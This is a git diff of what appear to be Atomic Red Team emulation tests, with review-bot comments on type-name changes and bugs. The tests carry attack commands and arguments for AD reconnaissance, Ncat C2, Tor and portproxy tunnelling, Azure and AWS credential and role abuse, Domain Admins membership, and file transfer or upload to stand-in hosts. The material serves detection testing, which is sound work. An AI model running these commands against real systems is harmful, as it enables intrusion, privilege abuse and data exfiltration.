description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
executor:
command: |
@@ -86,7 +86,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1087.001.txt
dependency_executor_name: sh
dependencies:
+11 -11
@@ -34,7 +34,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of remote system to query
type: String
type: string
default: "%COMPUTERNAME%"
executor:
command: |
@@ -50,7 +50,7 @@ atomic_tests:
input_arguments:
adrecon_path:
description: Path of ADRecon.ps1 file
type: Path
type: path
default: $env:TEMP\ADRecon.ps1
dependency_executor_name: powershell
dependencies:
@@ -77,7 +77,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -101,7 +101,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -125,7 +125,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -149,7 +149,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -186,11 +186,11 @@ atomic_tests:
input_arguments:
domain:
description: Domain FQDN
type: String
type: string
default: $env:UserDnsDomain
uac_prop:
description: UAC Property to search
type: String
type: string
default: 524288
dependencies:
- description: |
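Review bot: `uac_prop` is declared `type: string` but its default `524288` is unquoted, so YAML loads it as an integer; if the new schema validates `default` against `type` this will fail, and it is inconsistent with the quoted port defaults elsewhere in this change (`default: "1337"`). Quote it as `default: "524288"`.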
@@ -282,13 +282,13 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
Domain:
Domain:
description: Domain that is being tested against
type: String
type: string
default: $env:USERDOMAIN
DomainController:
description: Domain Controller that is being tested against
type: String
type: string
default: $env:UserDnsDomain
dependency_executor_name: powershell
dependencies:
+10 -10
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
type: Url
type: url
default: 127.0.0.1:8080
proxy_scheme:
description: Protocol to proxy (http or https)
type: String
type: string
default: http
executor:
command: |
@@ -31,22 +31,22 @@ atomic_tests:
description: |
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host)
type: Url
type: url
default: 127.0.0.1
proxy_port:
description: Proxy server port
type: Integer
type: integer
default: 8080
interface:
description: Protocol to proxy (http or https)
type: String
type: string
default: Wi-Fi
executor:
name: sh
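Review bot: the `interface` argument's description reads `Protocol to proxy (http or https)`, copied from `proxy_scheme` in the hunk above, but its default is `Wi-Fi` and the test description says the proxy settings are changed for the specified network interface; change it to something like `Network interface whose proxy settings are modified`. The `Url`/`Integer`/`String` lowercasing is fine.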
@@ -67,15 +67,15 @@ atomic_tests:
input_arguments:
connectaddress:
description: Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer.
type: String
type: string
default: 127.0.0.1
connectport:
description: Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer.
type: String
type: string
default: "1337"
listenport:
description: Specifies the IPv4 port, by port number or service name, on which to listen.
type: String
type: string
default: "1337"
executor:
command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
+37 -37
@@ -11,29 +11,29 @@ atomic_tests:
http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
https://psiphon.ca/faq.html
supported_platforms:
- windows
dependency_executor_name: powershell
- windows
dependency_executor_name: powershell
dependencies:
- description: |
The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
prereq_command: |
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: |
The Psiphon executable must exist in the Downloads folder
prereq_command: |
if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
- description: |
Batch file containing commands to run must be in src directory
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
- description: |
The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
prereq_command: |
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: |
The Psiphon executable must exist in the Downloads folder
prereq_command: |
if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
- description: |
Batch file containing commands to run must be in src directory
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
executor:
name: powershell
command: |
@@ -52,8 +52,8 @@ atomic_tests:
- windows
input_arguments:
TorExe:
description: Location of tor.exe file.
type: String
description: Location of tor.exe file.
type: string
default: $env:temp\tor\Tor\tor.exe
dependency_executor_name: powershell
dependencies:
@@ -66,9 +66,9 @@ atomic_tests:
expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
executor:
command: |
invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
sleep -s 60
stop-process -name "tor" | out-null
invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
sleep -s 60
stop-process -name "tor" | out-null
name: powershell
elevation_required: false
- name: Tor Proxy Usage - Debian/Ubuntu
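Review bot: `stop-process -name "tor" | out-null` in the executor only discards output; if tor never started (for example the `cmd /c start powershell` window failed to launch) Stop-Process raises a non-terminating error that `out-null` does not suppress. Use `stop-process -name "tor" -ErrorAction SilentlyContinue`, and consider moving the kill into a `cleanup_command` so the 60 s sleep and the teardown are not part of the emulated technique itself.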
@@ -81,16 +81,16 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Tor must be installed on the machine
Tor must be installed on the machine
prereq_command: |
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
sudo apt-get -y install tor
sudo apt-get -y install tor
executor:
command: |
sudo systemctl start tor
sudo systemctl start tor
cleanup_command: |
sudo systemctl stop tor
sudo systemctl stop tor
name: sh
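Review bot: the prereq `command -v tor --version` hands `--version` to `command -v` as a second name to resolve, not as an option to tor; the check only passes because `-x` is applied to the printed path of `tor`. `if command -v tor >/dev/null 2>&1; then exit 0; else exit 1; fi` is the intended test and avoids the spurious non-zero status from the unresolvable `--version`. The same expression is used in the macOS test below.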
- name: Tor Proxy Usage - MacOS
auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
@@ -102,15 +102,15 @@ atomic_tests:
dependency_executor_name: sh
dependencies:
- description: |
Tor must be installed on the machine
Tor must be installed on the machine
prereq_command: |
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
get_prereq_command: |
if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor
executor:
command: |
osascript -e 'tell application "Terminal" to do script "tor"'
osascript -e 'tell application "Terminal" to do script "tor"'
cleanup_command: |
killall tor > /dev/null 2>&1
name: sh
killall tor > /dev/null 2>&1
name: sh
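Review bot: the Homebrew bootstrap in get_prereq_command has `keystroke return` left inside the curl command substitution (`curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return`); those two words are passed to curl as additional URLs that fail to resolve, and they look like residue from an osascript snippet, so drop them. Piping a remote installer straight into `/bin/bash -c` deserves a sentence in the description so users know a prereq step installs Homebrew, and `brew install tor` on the next line will not find `brew` if the freshly installed Homebrew prefix is not yet on PATH in this shell.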
+8 -8
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
server_ip:
description: The IP address of the listening server
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -19,7 +19,7 @@ atomic_tests:
Invoke-PowerShellIcmp -IPAddress #{server_ip}
name: powershell
- name: Netcat C2
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
description: |
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following:
@@ -29,19 +29,19 @@ atomic_tests:
input_arguments:
server_port:
description: The port for the C2 connection
type: Integer
type: integer
default: 80
ncat_exe:
description: The location of ncat.exe
type: Path
type: path
default: $env:TEMP\T1095\nmap-7.80\ncat.exe
ncat_path:
description: The folder path of ncat.exe
type: Path
type: path
default: $env:TEMP\T1095
server_ip:
description: The IP address or domain name of the listening server
type: String
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
@@ -74,11 +74,11 @@ atomic_tests:
input_arguments:
server_ip:
description: The IP address or domain name of the listening server
type: String
type: string
default: 127.0.0.1
server_port:
description: The port for the C2 connection
type: Integer
type: integer
default: 80
executor:
command: |
+21 -21
@@ -12,23 +12,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the targeted service principal
type: String
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: String
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: String
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
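Review bot: `path_to_cert` (description "Path of the new certificate, locally stored", default `$env:TEMP`) is still `type: string`; since this commit is about aligning with the schema's type names, it should be `type: path` like the other path arguments converted here. The same applies to `path_to_cert` in the App Registration test further down.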
@@ -83,7 +83,7 @@ atomic_tests:
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -97,23 +97,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
application_name:
description: Name of the targeted application
type: String
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: String
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: String
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
@@ -178,15 +178,15 @@ atomic_tests:
input_arguments:
username:
description: Create new AWS access and secret keys for the user
type: String
type: string
default: "atomicredteam"
dependencies:
- description: |
Check if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic
- description: |
Check if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic
executor:
command: |
aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
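Review bot: the prereq `aws iam list-users | grep #{username}` is a substring match, so a user named e.g. `atomicredteam2` satisfies it while `atomicredteam` does not exist and `create-access-key` then fails. `aws iam get-user --user-name #{username} > /dev/null 2>&1` checks the exact user and returns non-zero when it is absent. The executor also writes a live access key pair to `$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds`; the description should say that this file holds plaintext credentials and that cleanup must delete both the file and the key.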
+47 -47
@@ -41,7 +41,7 @@ atomic_tests:
auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
description: |
Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to
create the user and alter the group. Automatic installation of the dependency requires an elevated session,
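Review bot: typo in the description, `appropriare` should be `appropriate`.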
@@ -59,15 +59,15 @@ atomic_tests:
description: |
Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
type: String
type: string
default: atr-
group:
description: Name of the group to alter
type: String
type: string
default: "Domain Admins"
create_args:
description: Additional string appended to New-ADUser call
type: String
description: Additional string appended to New-ADUser call
type: string
default: ""
dependencies:
- description: |
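Review bot: the cleanup filter quoted in the `account_prefix` description, `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, expands with the default `atr-` to `samaccountname=atr--*`, which would not match the `atr-nnnnnnnn` account the test description says it creates. Either the description has a stray hyphen or the cleanup does; check it against the actual cleanup_command so that changing the prefix behaves as documented.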
@@ -110,15 +110,15 @@ atomic_tests:
input_arguments:
username:
description: Name of the AWS group to create
type: String
type: string
default: "atomicredteam"
dependencies:
- description: |
Check if the user exists, we can only add a user to a group if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic test
- description: |
Check if the user exists, we can only add a user to a group if the user exists.
prereq_command: |
aws iam list-users | grep #{username}
get_prereq_command: |
echo Please run atomic test T1136.003, before running this atomic test
executor:
command: |
aws iam create-group --group-name #{username}
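Review bot: the `username` argument is described as "Name of the AWS group to create", but the prereq checks it as an IAM user (`aws iam list-users | grep #{username}`) and the executor passes it as `--group-name`. State in the description that the one value is used both as the user to add and as the group name, and replace the substring grep with the exact `aws iam get-user --user-name #{username}` check as noted for T1098.001.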
@@ -135,7 +135,7 @@ atomic_tests:
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged authentication administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
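Review bot: typo in the description, `In targer you will also see User as a type` should read `In the target you will also see User as a type`. The same typo is in the service-principal variant of this test below.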
@@ -144,20 +144,20 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
user_principal_name:
description: Name of the targeted user (user principal)
type: String
type: string
default: SuperUser
role_name:
description: Name of the targed Azure AD role
type: String
default: Global Reader
type: string
default: Global Reader
dependencies:
- description: |
AzureAD module must be installed.
@@ -188,7 +188,7 @@ atomic_tests:
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
name: powershell
@@ -201,7 +201,7 @@ atomic_tests:
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged authentication administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
@@ -210,20 +210,20 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: String
type: string
default: SuperSP
role_name:
description: Name of the targed Azure AD role
type: String
default: Global Reader
type: string
default: Global Reader
dependencies:
- description: |
AzureAD module must be installed.
@@ -268,7 +268,7 @@ atomic_tests:
By default, the role Reader is assigned to user in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
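Review bot: grammar in the description, `New-AzRoleAssignment cmdlet could be also use to assign` should be `The New-AzRoleAssignment cmdlet can also be used to assign`; the same sentence recurs in the service-principal test below.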
@@ -279,23 +279,23 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
user_principal_name:
description: Name of the targeted user (user principal)
type: String
type: string
default: SuperUser
role_name:
description: Name of the targed Azure role
type: String
type: string
default: Reader
subscription:
description: Name of the targed subscription
type: String
type: string
default: Azure subscription 1
dependencies:
- description: |
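Review bot: `targed` in the `role_name` and `subscription` descriptions should be `targeted`; the same misspelling appears in the Azure AD role tests above (`Name of the targed Azure AD role`) and in the service-principal variant below, so fix all of them in one pass.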
@@ -346,7 +346,7 @@ atomic_tests:
By default, the role Reader is assigned to service principal in this test.
New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
@@ -357,24 +357,24 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: String
type: string
default: SuperSP
role_name:
description: Name of the targed Azure role
type: String
default: Reader
type: string
default: Reader
subscription:
description: Name of the targed subscription
type: String
default: Azure subscription 1
type: string
default: Azure subscription 1
dependencies:
- description: |
Az.Resources module must be installed.
@@ -410,7 +410,7 @@ atomic_tests:
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
name: powershell
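Review bot: the Write-Host in the cleanup references `$($subscriptions.Name)` while the variable null-checked two lines earlier is `$subscription`, so the message prints an empty subscription name; use `$subscription.Name`. Also confirm that `-Scope /subscriptions/$subscription` yields `/subscriptions/<id>`: if `$subscription` is the object returned by Get-AzSubscription it needs `.Id`.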
@@ -436,19 +436,19 @@ atomic_tests:
input_arguments:
username:
description: Azure AD username
type: String
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: String
type: string
default: p4sswd
application_name:
description: Name of the targed application
type: String
type: string
default: test_app
application_permission:
description: Permission from Microsoft Graph Resource API that will be add to application
type: String
type: string
default: DirectoryRecommendations.Read.All
dependencies:
- description: |
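Review bot: `targed` again in the `application_name` description, and `will be add to application` in the `application_permission` description should be `will be added to the application`.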
@@ -512,7 +512,7 @@ atomic_tests:
$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
name: powershell
elevation_required: false
- name: Password Change on Directory Service Restore Mode (DSRM) Account
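Review bot: the cleanup calls `Remove-AzureADApplication -ObjectId $aadApplication.ObjectId` with no null check; if the application was never created or was already removed, `$aadApplication` is `$null` and the call errors. Guard it the way the other cleanups in this file do: `if ($aadApplication -eq $null) { Write-Warning "Application not found"; exit }`.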
@@ -521,11 +521,11 @@ atomic_tests:
description: |
Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account
supported_platforms:
- windows
- windows
input_arguments:
sync_account:
description: Account to sync password from
type: String
type: string
default: '%username%'
executor:
name: command_prompt
+131 -131
@@ -11,19 +11,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive rsync
type: Path
type: path
default: /tmp/victim-files
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
local_path:
description: Path of folder to copy
type: Path
type: path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -39,19 +39,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Path of folder to copy
type: Path
type: path
default: /tmp/adversary-rsync/
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive rsync
type: Path
type: path
default: /tmp/victim-files
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -67,19 +67,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive scp
type: Path
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-scp
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -95,19 +95,19 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive scp
type: Path
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -123,19 +123,19 @@ atomic_tests:
input_arguments:
remote_path:
description: Remote path to receive sftp
type: Path
type: path
default: /tmp/victim-files/
local_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-sftp
remote_host:
description: Remote host to copy toward
type: String
type: string
default: victim-host
username:
description: User account to authenticate on remote host
type: String
type: string
default: victim
executor:
command: |
@@ -151,19 +151,19 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote host to copy from
type: String
type: string
default: adversary-host
local_path:
description: Local path to receive sftp
type: Path
type: path
default: /tmp/victim-files/
remote_file:
description: Path of file to copy
type: Path
type: path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
type: string
default: adversary
executor:
command: |
@@ -178,11 +178,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: Atomic-license.txt
executor:
command: |
@@ -199,11 +199,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
type: path
default: Atomic-license.txt
executor:
command: |
@@ -225,15 +225,15 @@ atomic_tests:
input_arguments:
bits_job_name:
description: Name of the created BITS job
type: String
type: string
default: qcxjb7
local_path:
description: Local path to place file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
executor:
command: |
@@ -249,11 +249,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to copy
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path:
description: Destination path to file
type: Path
type: path
default: $env:TEMP\Atomic-license.txt
executor:
command: |
@@ -270,7 +270,7 @@ atomic_tests:
input_arguments:
destination_path:
description: Path to create remote file at. Default is local admin share.
type: String
type: string
default: '\\localhost\C$'
executor:
command: |
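Review bot: `destination_path` (default `'\\localhost\C$'`, described as "Path to create remote file at") is typed `string`; `type: path` matches the direction of this commit.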
@@ -311,11 +311,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Location to save downloaded file
type: Path
type: path
default: '%temp%\Atomic-license.txt'
dependencies:
- description: 'Must have a Windows Defender version with MpCmdRun.exe installed'
@@ -341,31 +341,31 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote hostname or IP address
type: String
type: string
default: localhost
remote_port:
description: Remote port to connect to
type: Integer
type: integer
default: 8443
output_file:
description: Path of file to save output to
type: Path
type: path
default: /tmp/T1105.whois.out
query:
description: Query to send to remote server
type: String
type: string
default: "Hello from Atomic Red Team test T1105"
timeout:
description: Timeout period before ending process (seconds)
type: Integer
type: integer
default: 1
dependencies:
- description: |
The whois and timeout commands must be present
prereq_command: |
which whois && which timeout
get_prereq_command: |
echo "Please install timeout and the whois package"
- description: |
The whois and timeout commands must be present
prereq_command: |
which whois && which timeout
get_prereq_command: |
echo "Please install timeout and the whois package"
executor:
name: sh
elevation_required: false
@@ -382,11 +382,11 @@ atomic_tests:
input_arguments:
target_remote_file:
description: File to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
output_file:
description: File to write to
type: String
type: string
default: LICENSE.txt
executor:
command: |
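Review bot: `output_file` ("File to write to", default `LICENSE.txt`) stays `type: string` while `target_remote_file` next to it is converted to `url`; it should be `type: path`.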
@@ -404,7 +404,7 @@ atomic_tests:
input_arguments:
remote_host:
description: Remote hostname or IP address
type: String
type: string
default: localhost
executor:
name: command_prompt
@@ -447,24 +447,24 @@ atomic_tests:
input_arguments:
file_download:
description: File to download
type: String
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
executor:
command: |
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
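Review bot: the dependency copies curl.exe into `C:\Windows\System32`, which needs an elevated dependency executor; either mark the test `elevation_required: true` or copy into a user-writable location such as `$env:TEMP` and point `curl_path` there. `Remove-Item $env:temp\curl` on the extracted directory also lacks `-Recurse`, so PowerShell prompts for confirmation and blocks an unattended run; use `Remove-Item $env:temp\curl -Recurse -Force`. The zip is fetched from curl.se without a checksum, which is worth a pinned hash given the binary then lands in System32. Separately, `-k` in the executor disables TLS verification; that is part of the emulated behaviour and should be called out in the description.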
@@ -488,34 +488,34 @@ atomic_tests:
input_arguments:
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
remote_destination:
description: Remote destination
type: String
type: string
default: www.example.com
file_path:
description: File to upload
type: String
type: string
default: c:\temp\atomictestfile.txt
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
- description: |
A file must be created to upload
prereq_command: |
if (Test-Path #{file_path}) {exit 0} else {exit 1}
get_prereq_command: |
echo "This is an Atomic Test File" > #{file_path}
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
